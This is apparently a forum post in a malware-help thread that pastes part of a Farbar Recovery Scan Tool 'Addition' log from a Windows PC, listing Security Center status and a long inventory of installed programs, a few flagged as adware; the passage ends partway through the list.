hatethiscomputer

here's the addition: Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-09-2014 Ran by Victoria at 2014-09-15 19:50:27 Running from C:\Users\Victoria\Downloads Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Ad Nuker 4.5 (HKLM-x32\...\Ad Nuker_is1) (Version: - AdNuker.Com) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated) Adobe AIR (x32 Version: 3.1.0.4880 - Adobe Systems Incorporated) Hidden Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.6 - Adobe Systems Incorporated) Adobe Download Assistant (x32 Version: 1.2.6 - Adobe Systems Incorporated) Hidden Adobe Flash Player 11 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 11.9.900.170 - Adobe Systems Incorporated) Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.38 - Adobe Systems Incorporated) Adobe Photoshop Elements 12 (HKLM-x32\...\Adobe Photoshop Elements 12) (Version: 12.0 - Adobe Systems Incorporated) Adobe Photoshop Elements 12 (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden Adobe Reader X (10.1.11) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.11 - Adobe Systems Incorporated) Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.) AMD Catalyst Install Manager (HKLM\...\{3FAEEEBE-48F4-84C1-2B49-96AE73E67E3E}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.) AMD Wireless Display v3.0 (Version: 1.0.0.15 - Advanced Micro Devices, Inc.) Hidden Any Video Converter Professional 3.1.8 (HKLM-x32\...\Any Video Converter Professional_is1) (Version: - Any-Video-Converter.com) Apple Application Support (HKLM-x32\...\{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.) Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) Archibald's Adventures (x32 Version: 2.2.0.95 - WildTangent) Hidden Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.170 - Atheros) ATI Catalyst Control Center (HKLM-x32\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.010.0517.1741 - ) AVG 2012 (Version: 12.0.2092 - AVG Technologies) Hidden AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version: - ) AVStoDVD 2.7.1 (HKLM-x32\...\AVStoDVD) (Version: 2.7.1 - MrC) Batman: Arkham Asylum (HKLM-x32\...\{4E79A60F-15D2-4BEC-91AD-E41EC42E61B0}) (Version: 1.0.0.0 - Eidos Inc/Warner Brothers) Bing Bar (HKLM-x32\...\{6F6D8BC6-CE36-493B-996F-04CD8CCC35A8}) (Version: 7.0.614.0 - Microsoft Corporation) Birdies (x32 Version: 2.2.0.95 - WildTangent) Hidden BitRaider Web Client (HKLM-x32\...\BitRaider Web Client) (Version: 1.1.3.1 - BitRaider, LLC) Blekko search bar (HKLM-x32\...\blekkotb_soc) (Version: 1.1.0.1 - Visicom Media Inc.) <==== ATTENTION BlueStacks App Player (HKLM-x32\...\BlueStacks App Player) (Version: 0.7.15.909 - BlueStack Systems, Inc.) BlueStacks Notification Center (HKLM-x32\...\{74C85607-9668-4F88-B1D5-244889192DFC}) (Version: 0.7.15.909 - BlueStack Systems, Inc.) Bob the Builder Can-Do-Zoo (x32 Version: 2.2.0.95 - WildTangent) Hidden Boogie Bunnies (x32 Version: 2.2.0.98 - WildTangent) Hidden Brain Challenge (x32 Version: 2.2.0.95 - WildTangent) Hidden Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden Catalyst Control Center Graphics Previews Common (x32 Version: 2010.0517.1742.29870 - ATI) Hidden Catalyst Control Center Graphics Previews Vista (x32 Version: 2010.0517.1742.29870 - ATI) Hidden Catalyst Control Center InstallProxy (x32 Version: 2010.0517.1742.29870 - ATI Technologies, Inc.) Hidden Catalyst Control Center InstallProxy (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Localization All (x32 Version: 2010.0517.1742.29870 - ATI) Hidden CCC Help Chinese Standard (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Chinese Traditional (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Czech (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Danish (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Dutch (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help English (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Finnish (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help French (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help German (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Greek (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Hungarian (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Italian (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Japanese (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Korean (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Norwegian (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Polish (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Portuguese (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Russian (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Spanish (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Swedish (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Thai (x32 Version: 2010.0517.1741.29870 - ATI) Hidden CCC Help Turkish (x32 Version: 2010.0517.1741.29870 - ATI) Hidden ccc-core-static (x32 Version: 2010.0517.1742.29870 - ATI) Hidden ccc-utility64 (Version: 2010.0517.1742.29870 - ATI) Hidden CCleaner (HKLM\...\CCleaner) (Version: 4.15 - Piriform) Charter Browser Updater (HKCU\...\Charter Browser Updater) (Version: - Charter Communications) Cheat Engine 6.2 (HKLM-x32\...\Cheat Engine 6.2_is1) (Version: - Dark Byte) Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.) Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.) ClipConverter (HKLM-x32\...\{86134348-6422-4486-AB6A-0E01DBA39DE6}) (Version: 1.1.0 - Lunaweb) Clipdiary 3.5 (HKLM-x32\...\Clipdiary) (Version: 3.5 - Tiushkov Nikolay) ConvertXtoDVD 4.1.19.365 (HKLM-x32\...\{DB6AB705-C9BD-40E3-8929-2EA57F36A4FF}_is1) (Version: 4.1.19.365 - ) creepy 1.1 (HKLM-x32\...\{FCF4F348-E2F7-424B-8318-9C0E9FCBF39D}_is1) (Version: 1.1 - Ioannis Kakavas) CS16 Full v32.1 Non-Steam (HKLM-x32\...\CS16 Full v32.1 Non-Steam) (Version: - ) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden DAEMON Tools Pro (HKLM-x32\...\DAEMON Tools Pro) (Version: 4.41.0315.0262 - DT Soft Ltd) DAP Plug-in for 64 Bit IE (HKLM\...\{FB5688A1-05A2-4E9F-A5E7-872D71A6AAD6}) (Version: 9706.0.31 - SpeedBit) Database Tour Pro 7.0.3.411 (HKLM-x32\...\Database Tour Pro 7_is1) (Version: 7.0.3.411 - Vitaliy Levchenko) Debut Video Capture Software (HKLM-x32\...\Debut) (Version: 2.02 - NCH Software) Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5C78021E-3C8E-4EDF-97EA-E9B8D808FD6D}) (Version: - Microsoft) Dell DataSafe Local Backup - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 9.4.60 - Dell) Dell DataSafe Local Backup (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 9.4.60 - Dell) Dell DataSafe Online (HKLM-x32\...\{13766F76-6C8C-4E57-A9F3-3212D1C6E0D1}) (Version: 1.2.0011 - Dell, Inc.) Dell Dock (HKLM-x32\...\Dell Dock) (Version: - Stardock Corporation) Dell Dock (Version: 2.0 - Stardock Corporation) Hidden Dell Driver Download Manager (HKCU\...\f031ef6ac137efc5) (Version: 2.1.0.0 - Dell Inc.) Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc) Dell Getting Started Guide (HKLM-x32\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.) Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.) Deus Ex - Human Revolution version 1.0 (HKLM-x32\...\{1146E8F3-4057-4F46-B39C-D18AB4BB1523}_is1) (Version: 1.0 - Square Enix) Download Accelerator Plus (DAP) (HKLM-x32\...\Download Accelerator Plus (DAP)) (Version: 10035 (Build 2446) - Speedbit Ltd.) DownTango Launcher 2.1 (HKLM-x32\...\{4a505538-f48f-412e-9b69-dbac7e3149c3}_is1) (Version: 2.1 - DownTango Launcher) <==== ATTENTION Driver Genius Professional Edition (HKLM-x32\...\Driver Genius Professional Edition_is1) (Version: 11.0 - Driver-Soft Inc.) DriverBoost (HKLM-x32\...\{2BA09774-34F7-4A06-8C7E-B69E44CB9EB0}) (Version: 8.0.1 - DriverBoost) DriverFinder (HKLM-x32\...\DriverFinder) (Version: 2.1.0 - DeskToolsSoft) DriverUpdate (HKLM-x32\...\{850A14FC-F410-47F7-94E4-38F4D3F270D4}) (Version: 2.2.30452 - SlimWare Utilities, Inc.) Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD) Elements 12 Organizer (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden EPSON NX410 Series Printer Uninstall (HKLM\...\EPSON NX410 Series) (Version: - SEIKO EPSON Corporation) EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - ) Escape From Paradise (x32 Version: 2.2.0.95 - WildTangent) Hidden ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version: - ) Express Burn Disc Burning Software (HKLM-x32\...\ExpressBurn) (Version: 4.72 - NCH Software) Express Zip File Compression Software (HKLM-x32\...\ExpressZip) (Version: - NCH Software) Fallout 3 (HKLM-x32\...\{974C4B12-4D02-4879-85E0-61C95CC63E9E}) (Version: 1.00.0000 - Bethesda Softworks) Fallout New Vegas (HKLM-x32\...\Fallout New Vegas_is1) (Version: - ) Family Feud (x32 Version: 2.2.0.95 - WildTangent) Hidden Family Feud 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden Family Feud Battle of the Sexes (x32 Version: 2.2.0.95 - WildTangent) Hidden Farm Frenzy: Gone Fishing (x32 Version: 2.2.0.97 - WildTangent) Hidden ffdshow v1.2.4422 [2012-04-09] (HKLM-x32\...\ffdshow_is1) (Version: 1.2.4422.0 - ) FixCleaner (HKLM-x32\...\{540CBBEF-1433-4E5C-9817-4597493AA45F}) (Version: 2.0.4680 - Slimware Utilities, Inc.) Forum Proxy Leecher 1.11 (HKLM-x32\...\Forum Proxy Leecher_is1) (Version: - My-Proxy Software) Free Dll Viewer 0.1 (HKLM-x32\...\Free Dll Viewer) (Version: 0.1 - ) FreePriceAlerts 2.3.5 (HKLM\...\{DC3381CB-10D4-431D-B9B3-7DB84B00645F}) (Version: 2.3.5 - myVBO LLC) FVD Player 1.0.2 (HKLM-x32\...\FVD Player_is1) (Version: - flashvideodownloader.org) Gardenscapes: Mansion Makeover (x32 Version: 2.2.0.110 - WildTangent) Hidden Gem Smashers (x32 Version: 2.2.0.98 - WildTangent) Hidden Gold Rush Deluxe (x32 Version: 2.2.0.98 - WildTangent) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 37.0.2062.120 - Google Inc.) Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google) Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.) Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden GoToAssist 8.0.0.514 (HKLM-x32\...\GoToAssist) (Version: - ) GSplit 3 (HKLM-x32\...\GSplit3Set) (Version: 3.0.1.0 - G.D.G. Software) GTA San Andreas (HKLM-x32\...\{E0303B6A-C675-4102-95DA-C013625BFA99}) (Version: 1.00.00001 - Rockstar Games) Haali Media Splitter (HKLM-x32\...\HaaliMkx) (Version: - ) Half-Life 2 (HKCU\...\Half-Life 2) (Version: - ) Half-Life 2: Episode Two (HKLM-x32\...\Half-Life 2: Episode Two_is1) (Version: - HorseDIC86) IE Password Revealer 3 (HKLM-x32\...\{A27C76B8-45D6-4894-BE8C-C8F94B8172C5}) (Version: 3.1 - WellTek Software) ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.7.0 - LIGHTNING UK!) Internet Explorer (Enable DEP) (HKLM\...\{a9264802-8a7a-40fe-a135-5c6d204aed7a}.sdb) (Version: - ) Internet Explorer (x32 Version: 8 - Microsoft Corporation) Hidden Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.550 - Oracle) Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden Java 6 Update 21 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416021FF}) (Version: 6.0.210 - Oracle) Jojo's Fashion Show World Tour (x32 Version: 2.2.0.98 - WildTangent) Hidden Junk Mail filter update (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Kvisoft Data Recovery1.5.2 (HKLM-x32\...\Kvisoft Data Recovery_is1) (Version: 1.5.2 - Kvisoft Co.,Ltd.) Lexmark 2500 Series (HKLM\...\Lexmark 2500 Series) (Version: - Lexmark International, Inc.) LimeWire 5.5.10 (HKLM-x32\...\LimeWire) (Version: 5.5.10 - Lime Wire, LLC) Magic ISO Maker v5.5 (build 0281) (HKLM-x32\...\Magic ISO Maker v5.5 (build 0281)) (Version: - ) MagicDisc 2.7.106 (HKLM-x32\...\MagicDisc 2.7.106) (Version: - ) Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation) Mass Effect (HKLM-x32\...\{1B0FBB9A-995D-47cd-87CD-13E68B676E4F}) (Version: 1.00 - Electronic Arts, Inc.) Mass Effect 2 (HKLM-x32\...\{75D84EF7-0D8C-4e70-B3FA-7B42A5D4E0EB}) (Version: 1.02 - Electronic Arts, Inc.) Mass Effect 3 © Bioware version 1 (HKLM-x32\...\TWFzcyBFZmZlY3QgMyAoYykgQmlvd2FyZQ==_is1) (Version: 1 - ) McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.) Media Player Codec Pack 4.2.4 (HKLM-x32\...\Media Player - Codec Pack) (Version: 4.2.4 - Media Player Codec Pack) <==== ATTENTION Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation) Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation) Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft Office Click-to-Run 2010 (Version: 14.0.4763.1000 - Microsoft Corporation) Hidden Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Home and Business 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Office Office 64-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (French) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Single Image 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden Microsoft PowerPoint Viewer (HKLM-x32\...\{95140000-00AF-0409-0000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation) Microsoft SkyDrive (HKCU\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{820B6609-4C97-3A2B-B644-573B06A0F0CC}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation) Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.50727 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.51106 (x32 Version: 11.0.51106 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.50727 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.51106 (x32 Version: 11.0.51106 - Microsoft Corporation) Hidden MotioninJoy Gamepad tool 0.7.1001 (HKLM\...\{330DAC67-5B62-452A-A0E4-6B4A5923940F}_is1) (Version: 0.7.1001 - www.motioninjoy.com) Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Mozilla Firefox 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla) MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) MultiClock 1.0 (HKLM-x32\...\MultiClock) (Version: 1.0 - Fried Cookie) Multimedia Card Reader (HKLM-x32\...\InstallShield_{23B4636C-A780-4FEB-B4C9-A2564E9B9F7C}) (Version: 1.6.915.87 - Fitipower) Multimedia Card Reader (x32 Version: 1.6.915.87 - Fitipower) Hidden My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.) My Farm Life (x32 Version: 2.2.0.97 - WildTangent) Hidden Nancy Drew - Legend of the Crystal Skull (x32 Version: 2.2.0.95 - WildTangent) Hidden Nancy Drew: Trail of the Twister (x32 Version: 2.2.0.98 - WildTangent) Hidden NETGEAR WG111v2 wireless USB 2.0 adapter (HKLM-x32\...\{4102037D-E8E0-48E0-B203-E521D194FB71}) (Version: 1.0.0.133 - NETGEAR) NETGEAR WG111v2 wireless USB 2.0 adapter (HKLM-x32\...\InstallShield_{E0F252A6-DE85-4E93-A93B-DFC3537B3965}) (Version: 1.00.03281 - NETGEAR) NETGEAR WG111v2 wireless USB 2.0 adapter (x32 Version: 1.00.03281 - NETGEAR) Hidden Nick Jr Bingo (x32 Version: 2.2.0.98 - WildTangent) Hidden No-IP DUC (HKLM-x32\...\NoIPDUC) (Version: 4.1.0 - Vitalwerks Internet Solutions LLC) Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.5.3 - Notepad++ Team) NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation) OpenMG Limited Patch 4.7-07-14-05-01 (HKLM-x32\...\OpenMG HotFix4.7-07-13-22-01) (Version: - ) OpenMG Secure Module 4.7.00 (HKLM-x32\...\InstallShield_{CCD663AE-610D-4BDF-AAB0-E914B044527D}) (Version: 4.7.00.12140 - Sony Corporation) OpenMG Secure Module 4.7.00 (x32 Version: 4.7.00.12140 - Sony Corporation) Hidden OpenVPN 2.3.4-I001 (HKLM-x32\...\OpenVPN) (Version: 2.3.4-I001 - ) Password Recovery Bundle 2012 (HKLM-x32\...\Password Recovery Bundle 2012_is1) (Version: - Top Password Software, Inc.) PDF Reader (HKCU\...\PDF Reader) (Version: - ) Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Plugin Update (HKLM-x32\...\uc@uc.com) (Version: - ) Privacy SafeGuard version 1.0 (HKLM\...\{B820C985-D9F1-45B5-A7F5-0C5863CBEA04}_is1) (Version: 1.0 - Privacy SafeGuard) PSE12 STI Installer (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.) Rapport (Version: 3.5.1201.78 - Trusteer) Hidden Rapport (x32 Version: 3.5.1403.67 - Trusteer) Hidden RealDownloader (x32 Version: 17.0.11 - RealNetworks, Inc.) Hidden RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.10 - RealNetworks) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7240 - Realtek Semiconductor Corp.) RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden Revo Uninstaller 1.94 (HKLM-x32\...\Revo Uninstaller) (Version: 1.94 - VS Revo Group) Revo Uninstaller Pro 2.5.9 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 2.5.9 - VS Revo Group, Ltd.) Running Sheep (x32 Version: 2.2.0.98 - WildTangent) Hidden Running Sheep: Tiny Worlds (x32 Version: 2.2.0.98 - WildTangent) Hidden Secret of the Past The Mother's Diary (x32 Version: 3.0.2.32 - WildTangent) Hidden Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition 